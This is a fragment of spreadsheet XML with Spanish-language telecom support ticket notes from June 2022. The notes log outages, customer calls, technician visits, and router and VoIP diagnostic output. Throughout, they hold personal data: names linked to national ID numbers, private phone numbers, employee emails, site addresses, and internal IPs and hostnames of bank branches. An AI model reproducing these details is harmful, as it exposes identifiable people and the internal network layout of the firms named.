01320096-0 OSCAR RENE VIDES RAMIREZ
00936126-7 MARIO ERNESTO CRUZ MARQUEZ
02878871-1 JOSE ALFREDO JIMENEZ
00580847-9 CARLOS EDUARDO GOMEZ ZELEDON
04086716-7 GERARDO ANTONIO MINERO FERNANDEZ
02400310-1 EDGAR MAURICIO MONTOYA SANCHEZ
03547221-1 RONAL MOREL CRESPIN
00157708-4 ABRAHAM SAMUEL PEREZ
03245714-4 ADAN ERNESTO GONZALEZ
01101266-2 JOSE SALVADOR PORTILLO VELASQUEZ
05356271-8 KEVIN MEJIA
04271773-2 MIGUEL DUEÑAS
QUEDO ATENTO  A SU RESPUESTA  ,</t>
  </si>
  <si>
    <t>F4616469</t>
  </si>
  <si>
    <t>--- SE SOLICITA A CNOC REACTIVO POR SKYPE DAR SEGUIMIENTO, POR FAVOR VERIF. SI YA SE ENCUENTRA ACTIVO O AUN ES NECESARIO LOCALIZAR A LA PERSONA QUE SE ENCUENTRA EN EL SITIO,. ...
...</t>
  </si>
  <si>
    <t>F4616473</t>
  </si>
  <si>
    <t>--- SE ENVIA CORREO AL CLIENTE. ...
DE: DIEGO PABLO AJIN HERNANDEZ
ENVIADO EL: DOMINGO, 26 DE JUNIO DE 2022 07:43
PARA: SMC RECOVERY AMERICAS BUSINESS SOLUTIONS &lt;SMC.RECOVERY.AMERICAS.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: REPORTANDO | AVIANCA * GUATEMALA * MULTIPLES CIRCUITS * CID 1014485 &amp; 0437182 * DOWN * INC000003783534 * SEV 2
ESTIMADO CLIENTE.
                POR PARTE DE CLARO LOS SERVICIOS SE ENCUENTRAN DE MANERA CORRECTA
SD1138551 / CID: C-0201801566
SD1138554 / CID: C-0201800191
SD1138555 / CID: C-0201800192
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS, CASO CONTARIO SE PROCEDERÁ AL CIERRE DE LOS TICKET Y DE REQUERIR ALGÚN APOYO ADICIONAL SE GENERARAN OTROS CASOS.
...</t>
  </si>
  <si>
    <t>F4616492</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  DARWIN AVILA   32905014
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE COMENTA QUE YA REINICIARON LOS EQUIPOS INDICA QUE EL EQUIPO TELLABS SE ENCUENTRA ALARMADO, YA VALIDARON DE PARTE DE LA PBX Y SI ESTA FUNCIONANDO, SOLICITA QUE SE LE ENVIE PERSONAL TECNICO A REVISAR EL DIA DE HOY, INDICA QUE SI ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO A LS INSTALACIONES Y QUE SE LE ENVIE VIA CORREO SOPORTE.SUR@COIDE.COM.GT ##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4616493</t>
  </si>
  <si>
    <t>VISITA SE PROGRAMA PARA EL DIA LUNES A LAS 8:00 AM
DE: TIC POCASANGRE, BRYAN &lt;BRYAN.POCASANGRE@BANRURAL.COM.GT&gt;
ENVIADO: SÁBADO, 25 DE JUNIO DE 2022 12:16
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; AGE593@BANRURAL.COM.GT &lt;AGE593@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SIN SERVICIO || 8902411T || BANRURAL || 2A. CALLE 1-30, ZONA 1 FRENTE AL PARQUE CENTRAL DE SAN FRANCISCO ZAPOTITLAN, SUCHITEPEQUEZ RETALHULEU
BUEN DIA ESTIMADO JUAN CARLOS,
LOS PERMISOS ESTÁN AUTORIZADOS PARA EL DIA LUNES 27 A LAS 8 AM, EL CONTACTO EN EL SITIO ES EL SIGUIENTE.
JOCABED ALONZO
CEL. 5555-0340
MUY AGRADECIDOS POR EL APOYO,
SALUDOS.</t>
  </si>
  <si>
    <t>F4616507</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ELIZABETH RODRIGUEZ 73182707 QUIEN APOYA UBICANDO EQUIPO ASMI54, INDICA QUE SE ENCUENTRA APAGADO, DEJA EN ESPERA EN LO QUE UBICA OTRO TOMACORRIENTE PARA HACER PRUEBAS. ID: 2001219616</t>
  </si>
  <si>
    <t>F4616532</t>
  </si>
  <si>
    <t>--- TIEMPO DE MONITOREO HA CONCLUIDO, SE SOLICITA A CNOC REACTIVO POR SKYPE DAR SEGUIMIENTO. ...
...</t>
  </si>
  <si>
    <t>F4616539</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KELVIN MARTINEZ 22399723 MENCIONA QUE YA ESTA DANDO SEGUIMIENTO CON EL CC PARA QUE SOLVENTE EL INCONVENIENTE
-ID 2001452704</t>
  </si>
  <si>
    <t>F4616544</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK ESCOTO 99924532 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001566260</t>
  </si>
  <si>
    <t>F4616546</t>
  </si>
  <si>
    <t>SE LLAMA A TELÉFONO	PBX 23083000 EXT. 066911, SIN EMBARGO NO SE LOGRA COMUNICACION.
ID
3001017762
COLA:
NOMBRE: A: 23083000
NÚMERO: 011 50223083000
DURACIÓN: 0:01:21
ESTADO: CONECTADA
DETALLES: +50223083000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 29/06/2022 16:33:03</t>
  </si>
  <si>
    <t>SE HABLA CON SERGIO SUBGERENTE DE AGENCIA, INFORMA QUE SI CUENTAN CON UPS Y QUE  HAN TENIDO INCONVENIENTES CON LA ENERGIA POR PROBLEMA INTERNO SIN EMBARGO INDICA QUE YA LO ESTAN RESOLVIENDO, SE SOLICITA FECHA ESTIMADA PERO INFORMA NUEVAMENTE QUE YA LO ESTAN RESOLVIENDO Y QUE YA DEBERIA ESTAR TRABAJANDO NORMAL, YA QUE CUANDO SE VA LA ENERGIA SE APAGAN LOS EQUIPOS Y POR SER TEMA URGENTE YA LO ESTAN RESOLVIENDO, SE MANTENDRA EN OBSERVACION PARA VER SI NO SE TIENE MAS REINICIOS. TT PERMANECERA EN PENDIENTE CLIENTE.
ID
3001018250
COLA:
NOMBRE: A: 23083000
NÚMERO: 011 50223083000
DURACIÓN: 0:17:52
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50223083000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 29/06/2022 16:51:34</t>
  </si>
  <si>
    <t>F4616587</t>
  </si>
  <si>
    <t>SE  VALIDA REGISTRO NUEVAMENTE CORRECTO
AUTO_GUTIE_90001904271\VOIP\TRUNK\SIP-AUTO_GUTIE&gt;&gt;SHOW STATUS -S
STATUS OF SIP-AUTO_GUTIE
CONFIGURATION STATUS     : ENABLE
CURRENT REGISTRAR HOST   : 10.16.246.231
CURRENT PROXY HOST       : 10.16.246.231
  SECONDARY PROXY HOSTS  : NONE
INTERFACE STATUS         : VLAN-3775-VOIP UP
REGISTRATION STATUS      : REGISTERED (REFRESH TIME = 2485 SEC)
LOGICAL STATUS           : USED INTO INBOUNDLIST,OUTBOUNDLIST
MESSAGE WAITING          : NO
NO CONNECTIONS
COMMAND EXECUTED
AUTO_GUTIE_90001904271\VOIP\TRUNK\SIP-AUTO_GUTIE&gt;&gt;</t>
  </si>
  <si>
    <t>CLIENTE NOS CONFIRMA TANTO LLAMADAS ENTRANTES COMO SALIENTES, NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE LESLI GRAMAJO 36260784  PARA VALIDAR EL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4616589</t>
  </si>
  <si>
    <t>CLIENTE SAMUEL MARTINEZ 43386064 REALIZA PRUEBAS DE LLAMADAS Y VALIDA EL ENLACE OPEARTIVO. AUTORIZA EL CIERRE DEL CASO. ID: 2001237883</t>
  </si>
  <si>
    <t>F4616596</t>
  </si>
  <si>
    <t>SE HABLÓ CON PABLO FERNÁNDEZ/CLIENTE 22437253 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4616607</t>
  </si>
  <si>
    <t>F4616624</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DIEGO CABRERA  AL 42111939 INDICA QUE AUN SIGUE TENIENDO PERDIDAS || SE NOTIFICA A GESTOR **
-ID 2001450804
**</t>
  </si>
  <si>
    <t>CLIENTE SR. DIEGO CABRERA 42111939 SE LE DEMUESTRA QUE LAS PERDIDAS QUE OBSERVA ES POR SATURACION, SE RETIRA LIMITANTE  Y CONFIRMA QUE YA NO OBSERVA PERDIDAS, SE ENVIARA EVIDENCIA A LA COLA DE CORREOS ...</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE SR. DIEGO CABRERA 42111939 ACTUALMENTE EN LLAMADA....</t>
  </si>
  <si>
    <t>SE ENVIA EVIDENCIA A LA COLA DE CORREOS DONDE SE ENCUENTRA EL EJECUTIVO DE CLIENTE, ESTIMADOS VALIDAR MEDIANTE SD, GRACIAS.
RE: TICKET SD1138598</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DIEGO CABRERA  AL 42111939 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001430754
**</t>
  </si>
  <si>
    <t>F4616689</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARDOQUEO ORTEGA AL 53520130 INDICA QUE EL NO SE ENCUENTRA LABORANDO EL DIA DE HOY SOLICITA QUE SE LLAME A CENTRAL**
-ID 2001416966
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON GOMEZ 77401515 - 59362053 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001648194 - 2001648365</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARDOQUEO ORTEGA 53520130 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001605457</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON GOMEZ AL 77401515  INDICA QUE YA ESTAN AUTORIZADOS LOS PERMISOS **
-ID 2001547195
**</t>
  </si>
  <si>
    <t>SE TRATA DE CONTACTAR CON CLIENTE MARDOQUEO PERO NO SE TIENE RESPUESTA,
2001593068
COLA:
NOMBRE: A: 53520130
NÚMERO: 55280199
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 27/06/2022 16:37:54</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON GOMEZ 77401515 - 59362053 PARA BRINDAR RETROALIMENTACION
CLIENTE INDICA QUE ESTARA REALIZANDO PRUEBAS, SE VALIDARA EL FUNCIONAMIENTO EL DIA DE MAÑANA (CLIENTE NO BRINDA HORA)
-ID 2001605721 - 2001605937</t>
  </si>
  <si>
    <t>SE LLAMA A LA CENTRAL BYRON GOMEZ AL NUMERO 59362053 INDICA QUE ESTA VALIDANDO PERO NO LE RESPONDE EL ENLACE SOLICITA QUE SE VERIFIQUE || SE NOTIFICA A GESTOR **
-ID 2001417133
**</t>
  </si>
  <si>
    <t>F4616709</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE NELSON RAMOS 78549471  QUIEN COMENTA QUE EL EQUIPO ASMI54 ESTÁ CON TODAS LOS INDICADORES ENCENDIDOS, SE REINICIA EL EQUIPO Y CONTINUA EN EL MISMO ESTADO, POSIBLEMENTE SE DAÑÓ EL EQUIPO POR LO QUE SE COORDINA VISITA PARA EL DÍA LUNES A LAS 7:30 AM A SOLICITUD DEL CLIENTE YA QUE A LAS 12:00 PM SE RETIRAN EL DÍA DE HOY. NO ES NECESARIO TRAMITARE PERMISOS
2001253840
COLA:
NOMBRE: A: 0050378549471
NÚMERO: 0050378549471
DURACIÓN: 0:02:51
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050378549471
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 25/06/2022 11:51:10 A. M.</t>
  </si>
  <si>
    <t>F4616711</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELVIN HERNANDEZ   AL 32249744 CONFIRMA SERVICIO ESTABLE Y OPERATIVO || }
AUTORIZA CIERRE DE TICKET**
-ID 2001433228
**</t>
  </si>
  <si>
    <t>--- A SOLICITUD DEL CLIENTE, SEL SERVICIO PERMANECERA EN MONITOREO HASTA EL DIA DE MAÑANA A LAS 8:00 HRS. ...
...</t>
  </si>
  <si>
    <t>F4616723</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYRA HERNANDEZ 54406483 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001433453 - 2001434665</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MAYRA HERNANDEZ 54406483   INDICA QUE AÚN NO LOGRA UBICAR SUS CREDENCIALES, COMENTA QUE SE COMUNICARÁ CON SU EJECUTIVO EL DIA LUNES YA QUE HOY NO LE HA CONTESTADO. SE LE DARÁ SEGUIMIENTO EL LUNES. ID: 2001286034</t>
  </si>
  <si>
    <t>F4616725</t>
  </si>
  <si>
    <t>F4616752</t>
  </si>
  <si>
    <t>FALLA GENERAL F4616408/FALLA MASIVA F4616789:
CAIDA TOTAL || ATN  RUR1236 NNI_L2T_SW_AGG_10.199.16.215_G0/2/4_I_FO_HUAW_10G ||  MASIVO_CR
SEGUIMIENTO DE LA FALLA:
25/06/2022 18:48:10 GUATEMALA/CENTRO AMERICA (ENRIQUE RAFAEL CASTILLO GONZALEZ):
SE HABLÓ CON JOSTIN QUIROS/CCR CR INDICA QUE HAY PERSONAL DE UFINET TRABAJANDO EN LA REPARACIÓN DEL CORTE DE FO EN SECTOR, PUES UN CAMIÓN SE INCENDIÓ Y HAY FO QUEMADA; NOS APOYARÁ CON AVANCES.</t>
  </si>
  <si>
    <t>F4616811</t>
  </si>
  <si>
    <t>F4616861</t>
  </si>
  <si>
    <t>F4616862</t>
  </si>
  <si>
    <t>F4616883</t>
  </si>
  <si>
    <t>SE VALIDA ENLACE REDUNDANTE UP, CON APOYO DE CLIENTE SE RECONECTA CABLE DE RED, ESTA EN POCISION CORRECTA G0/0 , LUEGO DE RECONECTAR PUERTO WAN PRINCIPAL LOGRA RESTABLECER. EN CPE
ID
2001319460
COLA:
NOMBRE: A: 51984313
NÚMERO: 51984313
DURACIÓN: 0:06:44
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 51984313
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 25/06/2022 18:33:00
CC_BANRURAL_GT_AGENCIA_0275#SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0                          DOWN           DOWN     WAN PRINCIPAL/_/8900791T/_/
GI0/0.1                        DOWN           DOWN     WAN PRINCIPAL/_/8900791T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/8901763T/_/
FA0/0/0                        DOWN           DOWN     LAN DEL CLIENTE
FA0/0/1                        DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/2                        DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/3                        UP             UP       INTERFACE ACTUALMENTE NO ESTA EN USO
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0275#SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0                          UP             UP       WAN PRINCIPAL/_/8900791T/_/
GI0/0.1                        UP             UP       WAN PRINCIPAL/_/8900791T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/8901763T/_/
FA0/0/0                        DOWN           DOWN     LAN DEL CLIENTE
FA0/0/1                        DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/2                        DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/3                        UP             UP       INTERFACE ACTUALMENTE NO ESTA EN USO
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE</t>
  </si>
  <si>
    <t>F4616884</t>
  </si>
  <si>
    <t>CLIENTE VALERY GOMEZ 54221576 INDICA QUE LAS LLAMADAS COMPLETAN ALGUNAS VECES Y OTRA NO, INCISTE EN QUE SE CERTIFIQUE EL SERVICIO. SE ABRIRÁ WO
ID: 2001437381</t>
  </si>
  <si>
    <t>CLIENTE VALERY GOMEZ 54221576 INDICA QUE NO PUEDE RECIBIR LLAMADAS HACIA LOS DID 22160410 Y 22160411, SE PRUEBA LLAMANDO A LOS NÚMEROS Y SE OBSERVA QUE SÍ COMPLETAN. SE LE SOLICITA AL CLIENTE REALIZAR PRUEBAS NUEVAMENTE YA QUE A NIVEL DE CLARO NO SE OBSERVA INCONVENIENTE. SE LE LLAMARÁ EN 15 MINUTOS. ID DE LLAMADA: 2001296541</t>
  </si>
  <si>
    <t>F4616913</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, INDICA QUE LA PERSONA CON LA QUE SE TIENIA QUE REALIZAR LA ACCION AYER EN LA NOCHE NO LABORA EL DÍA DE HOY Y A PARTIR DE MAÑANA ENTRA DE VACACIONES || INDICA QUE ACTUALMENTE SE TIENEN BASTATES CLIENTES POR LO QUE NO PUEDE APOYAR, ASI QUE SOLICITA QUE SE LE LLAME NUEVAMENTE A LAS 17:30
2001382902
COLA:
NOMBRE: A: 58539305
NÚMERO: 58539305
DURACIÓN: 0:03:41
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58539305
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 26/06/2022 14:29:25</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR NUEVAMENTE PERO NO SE TIENE RESPUESTA
2001399791
COLA:
NOMBRE: A: 58539305
NÚMERO: 58539305
DURACIÓN: 0:00:29
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58539305
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 26/06/2022 17:22:13
2001399891
COLA:
NOMBRE: A: 58539305
NÚMERO: 58539305
DURACIÓN: 0:00:40
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58539305
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 26/06/2022 17:24:07</t>
  </si>
  <si>
    <t>F4616923</t>
  </si>
  <si>
    <t>FINALIZAN PRUEBAS REALIZADAS CON SERVICIO, EXITOSO, SE CERTIFICA FIBRA OPTICA, EQUIPOS Y BW (SE ADJUNTA IMÁGENES)
LLAMADA CON TECNICO
2001339694
COLA:
NOMBRE: A: 58266635
NÚMERO: 58266635
DURACIÓN: 0:36:36
ESTADO: RETENIDA
DETALLES: 58266635
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 26/06/2022 09:39:12
SE LLAMA A CLIENTE QUIEN REPORTA JESICA SIERRA37622113 PERO NO CONTESTA
2001343824
COLA:
NOMBRE: A: 37622113
NÚMERO: 37622113
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 37622113
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 26/06/2022 09:39:02
2001343875
COLA:
NOMBRE: A: 37622113
NÚMERO: 37622113
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 37622113
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 26/06/2022 09:39:43</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE A OTROS NÚMEROS 2001344612 NOE HUTUY O LAURA GONZALES 46840847 - 54748820  , EN PR CONTESTA BRYAN ALVAREZ VALIDA SERVICIO YA TECNICO LE MOSTRO QUE TODO ESTÁ BIEN, BRYAN TOMO FOTOGRAFIAS DE PRUEBAS DE IGUAL FORMA
COLA:
NOMBRE: A: 46840847
NÚMERO: 55280199
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 26/06/2022 09:46:27</t>
  </si>
  <si>
    <t>F4616928</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  NOE HUTUY AL 46840847 Y BRINDA LOS SIGUIENTES DATOS PARA VISITA **
HORARIO DE ATENCION: 8:00 A 18:00 HRS
GESTION DE PERMISOS: SE NECESITAN TRAMITAR ACCESOS ENVIAR CORREO A JESSICA.SIERRA@EZCORPO.COM
DIRECCCION: 4 AV. 1-40 Z.1 SAN FRANCISCO EL ALTO TOTONICAPAN
ATENDERA EN SITIO: NOE HUTUY
-ID 2001417713
**</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO  SE ACCESOS  YA QUE CLIENTE INDICA QUE NO SE RECIBIO NINGUN CORREO SOLICITANDO ACCEOSO
GSTION DE ACCESOS F4616928 | 354700016T | JANAMA S.A. |REDUNDANCIA INTERNET.- 4 AV. 1-40 Z.1 SAN FRANCISCO EL ALTO TOTONICAPAN
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:JESSICA.SIERRA@EZCORP.COM
CC:CNOCCA;GRUPO N1
MIÉ 29/06/2022 9:16
BUEN DÍA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO F4616928 | 354700016T | JANAMA S.A. |REDUNDANCIA INTERNET.- 4 AV. 1-40 Z.1 SAN FRANCISCO EL ALTO TOTONICAPAN
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICO:
NOMBRE                                                                      IBM                        DPI
CARLOS  ROBETO DE LEON SANTIZO                                            555555                    2334897970901
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4616974</t>
  </si>
  <si>
    <t>CLIENTE RESPSPONDE QEU SE PUEDE CERRAR EL TTK</t>
  </si>
  <si>
    <t>SE VALIDA EN LOS LOGS DE ALARMAS QUE SE TUVO UNA CAIDA EN WAN DEL EQUIPO SE TUVO UNA RECONVERGENCI QUE SE OBSERVA EN LAS ALARMAS DEL EQUIPO
*JUN 25 21:32:42.302 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN 25 21:32:50.302 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 25 21:32:51.302 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 25 21:33:08.302 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN 25 21:33:09.302 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN 25 21:33:16.302 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 25 21:33:17.302 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 25 21:33:35.046 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.254 ON TUNNEL1 FROM LOADING TO FULL, LOADING DONE
*JUN 25 21:33:44.582 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.253 ON TUNNEL0 FROM LOADING TO FULL, LOADING DONE
*JUN 25 23:01:17.374 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.254 ON TUNNEL1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*JUN 25 23:01:18.486 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.253 ON TUNNEL0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*JUN 25 23:06:08.262 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.254 ON TUNNEL1 FROM LOADING TO FULL, LOADING DONE
*JUN 25 23:06:13.302 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.253 ON TUNNEL0 FROM LOADING TO FULL, LOADING DONE
CC_AZTECA_GT_SUC_33180_MAZATE_265900363T#
CC_AZTECA_GT_SUC_33180_MAZATE_265900363T#SHO CLOC
*23:48:49.518 UTC SAT JUN 25 2022
CC_AZTECA_GT_SUC_33180_MAZATE_265900363T#</t>
  </si>
  <si>
    <t>F4616976</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EN PR 30897245 MARIA JOSE MARTINEZ COMENTA QUE A ELLOS LES RESTRINGEN AREA DONDE SE QUIERE VERIFICAR Y QUE ELLA HA ESTADO INTENTANDO LLAMAR A CENTRAL ANGEL RAMOS PORQUE DEBEN DE PERMITIR TRABAJOS EN CIELO FALSO, CLIENTE EN SITIO REMOTO COMENTA QUE SE REPROGRAME CON PERSONAL DE SISTEMAS
HAY QUE COORDINAR CON CENTRAL TRABAJOS EN CIELO FALSO, ADEMAS DE QUE NO HAY LLAVE A GABINETE Y NO SE PUEDE VERIFICAR
2001373501
COLA:
NOMBRE: A: 30897245
NÚMERO: 011 50230897245
DURACIÓN: 0:02:53
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50230897245
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 26/06/2022 13:09:09
2001371134
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 41199982
NÚMERO: 41199982
DURACIÓN: 0:22:41
ESTADO: ACD - ASIGNADO A: ERITO.TECU
DETALLES: 41199982
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 26/06/2022 13:10:49</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGEL RAMOS AL 56941273 PERO NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001259198
**</t>
  </si>
  <si>
    <t>SE ENVÍA NUEVAMENTE CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO , SE ADJUNTA AL CORREO LOS DATOS DE LOS NUEVOS TÉCNICOS QUE ATENDERAN EN SITIO
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO,
DIRECCIÓN:   REDUNDANCIA INTERNET.- KM 88.5 CARRETERA A MAZATENANGO CENTRO COMERCIAL PRADERA EXPRESS LOCAL 6 SANT
ADJUNTAMOS DATOS ADICIONALES DE TÉCNICOS
OMAR JOSUE LOPEZ SAENZ¿¿2090984220301
JUAN MIGUEL BERCIAN MORALES¿¿¿2292209672201
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ÁNGEL RAMOS/CLIENTE SE LE INDICA LO DICHO POR PR; ADICIONAL SE LE INDICA QUE SE LE ENVIÓ CORREO PARA QUE NOS APOYE CON EL INGRESO DE TÉCNICOS A ASIGNAR; INDICA QUE NO HABÍA VISTO EL CORREO, PERO CONTESTARÁ A LA BREVEDAD.</t>
  </si>
  <si>
    <t>F4617014</t>
  </si>
  <si>
